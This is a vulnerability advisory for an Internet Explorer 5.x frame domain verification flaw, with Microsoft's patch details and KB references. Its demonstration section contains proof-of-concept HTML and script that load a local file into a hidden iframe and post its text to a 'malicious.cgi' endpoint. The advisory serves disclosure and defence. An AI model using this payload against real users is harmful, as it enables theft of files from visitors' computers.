IE Frame Domain Verification Reported May 19 by Andrew Nosenko
VERSIONS EFFECTED
Internet Explorer 5.x
DESCRIPTION
When a web server opens a frame within a window, the IE security model should only
allow the parent window to access the data in the frame if they are in the same domain.
However, two functions available in IE do not properly perform domain checking, with the
result that the parent window could open a frame that contains a file on the local
computer, then read it. This could allow a malicious web site operator to view files on
the computer of a visiting user. The web site operator would need to know (or guess) the
name and location of the file, and could only view file types that can be opened in a
browser window.
DEMONSTRATION
<iframe id=clientContent width=0 height=0
noborder>
</iframe>
<script for=clientContent event="DocumentComplete(browser)">
alert (browser.document.body.innerText);
// browser is an instance of the IWebBrowser COM object
document.forms\[0\].elements\[0\].value = browser.document.body.innerText;
document.forms\[0\].submit ();
</script>
<script>
clientContent.navigate("c:\\some_file.txt")
</script>
<form action="/cgi/malicious.cgi" method=post
onSubmit="window.alert(document.forms\[0\].elements\[0\].value); return
true">
<input name="file_text" type=hidden>
</form>
VENDOR RESPONSE
Microsoft has issued a
patch for the problem.
The patches require IE 4.01 Service Pack 2 or IE
5.01 to install. Customers using versions prior to these may receive a message reading
"This update does not need to be installed on this system". This message is
incorrect. More information is available in KB article Q262509.
- Frequently Asked Questions: Microsoft Security
Bulletin MS00-033, http://www.microsoft.com/technet/security/bulletin/fq00-033.asp
- Knowledge Base article Q262509
discusses the overall patch
- Knowledge Base articles Q251108
and Q255676
discuss the "Frame Domain Verification" vulnerability
- Microsoft Knowledge Base article Q258430
discusses the
"Unauthorized Cookie Access" vulnerability
- Microsoft Knowledge Base article Q261257
discusses the
"Malformed Component Attribute" vulnerability
- Microsoft Knowledge Base (KB) article Q247333,
Web Proxy Auto-Discovery "Spoofing" May Change Proxy Settings, http://www.microsoft.com/technet/support/kb.asp?ID=247333
- Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
CREDITS Discovered and reported by Andrew Nosenko
|